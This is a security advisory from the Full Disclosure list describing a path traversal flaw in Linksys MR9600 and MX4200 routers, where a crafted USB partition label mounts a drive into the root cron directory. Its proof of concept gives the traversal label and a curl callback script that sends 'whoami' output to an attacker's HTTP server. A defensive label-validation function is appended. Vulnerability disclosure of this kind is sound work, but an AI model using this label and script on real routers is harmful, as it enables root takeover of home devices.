Advisory ID: SYSS-2025-001
Product: MR9600, MX4200 (and potentially others)
Manufacturer: Linksys
Affected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others)
Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type: Path Traversal (CWE-22)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2025-03-18
Solution Date: -
Public Disclosure: 2026-02-12
CVE Reference: Not yet assigned
Author of Advisory: Christian Zäske, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for next-level streaming and gaming. Its powerful WiFi 6 mesh coverage offers faster WiFi performance for lag-free online gaming and simultaneous streaming to every device and corner of your home."

Due to missing neutralization of special elements, the contents of a USB drive partition can be mounted at an arbitrary location in the file system. This can also result in the execution of shell scripts in the context of the root user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and other models) provides a USB port to share the contents of a USB drive as an SMB share in the local network. Internally, the partition is mounted at "/tmp/anon_smb/<partition name>" by the script "/etc/init.d/service_tsmb.sh".

Because the script does not neutralize special elements such as "../", the mount point can be changed to an arbitrary location by setting the name of the partition on the USB drive to "../../", followed by a path within the file system of the device. By choosing a path from which scripts are executed on a regular basis, this vulnerability can be used to execute commands in the context of the root user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To execute the following shell script, the partition of the USB drive can be named "../../tmp/cron/cron.everyminute" and the script can be copied to the root of this partition. After plugging the USB drive into the device, the partition will be mounted at "/tmp/cron/cron.everyminute".
The following script shows the contents of the file "exploit.sh", which will be mounted into the "cron.everyminute" directory:

#!/bin/bash
curl http://192.168.2.57/$(whoami)

Because every script placed in this directory is executed once per minute, the script will run within at most 60 seconds.

On the attacker's computer, a simple HTTP server is spawned. After plugging in the USB stick, the script above is executed and the access to the HTTP server is logged, as can be seen in the following snippet:

$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.2.1 - - [01/Jan/2024 13:00:00] "GET /root HTTP/1.1" 404 -

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-11-11: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-001
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-001.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS GmbH.

E-Mail: [email protected]
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
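As an added defensive illustration for the Vulnerability Details section above (this is not code from the advisory, from SySS or from Linksys), the following POSIX shell function shows how a mount script such as the one described for "/tmp/anon_smb/<partition name>" can validate a partition label before building the mount point, so that a label containing "../" can never escape the base directory. The base directory and the sample labels are assumptions for illustration.

```shell
#!/bin/sh
# Added defensive example, not the vendor's /etc/init.d/service_tsmb.sh:
# derive the SMB mount point from a USB partition label only after
# rejecting path traversal. BASE and the sample labels are constructed.
BASE="/tmp/anon_smb"

# safe_mount_point LABEL
# Prints "$BASE/LABEL" and returns 0 if LABEL is a plain file name;
# returns 1 and prints nothing otherwise.
safe_mount_point() {
    label=$1
    # "." and ".." pass the character rule below but would resolve to
    # the base directory or its parent, so reject them explicitly.
    case "$label" in
        ''|.|..) return 1 ;;
    esac
    # Allow only alphanumerics, dot, underscore and dash. This rejects
    # "/" (and therefore any label like "../../tmp/cron/cron.everyminute")
    # as well as spaces and shell metacharacters that could break later
    # unquoted uses of the path in a mount script.
    case "$label" in
        *[!A-Za-z0-9._-]*) return 1 ;;
    esac
    printf '%s/%s\n' "$BASE" "$label"
}

# Demo over a benign label and the traversal label from the advisory.
for l in "usbdata" "../../tmp/cron/cron.everyminute"; do
    if mp=$(safe_mount_point "$l"); then
        echo "label '$l' -> mount point $mp"
    else
        echo "label '$l' rejected" >&2
    fi
done
```

A mount script using this check should also create the directory itself (rather than trusting an existing one) and mount with restrictive options such as nosuid and nodev.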
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
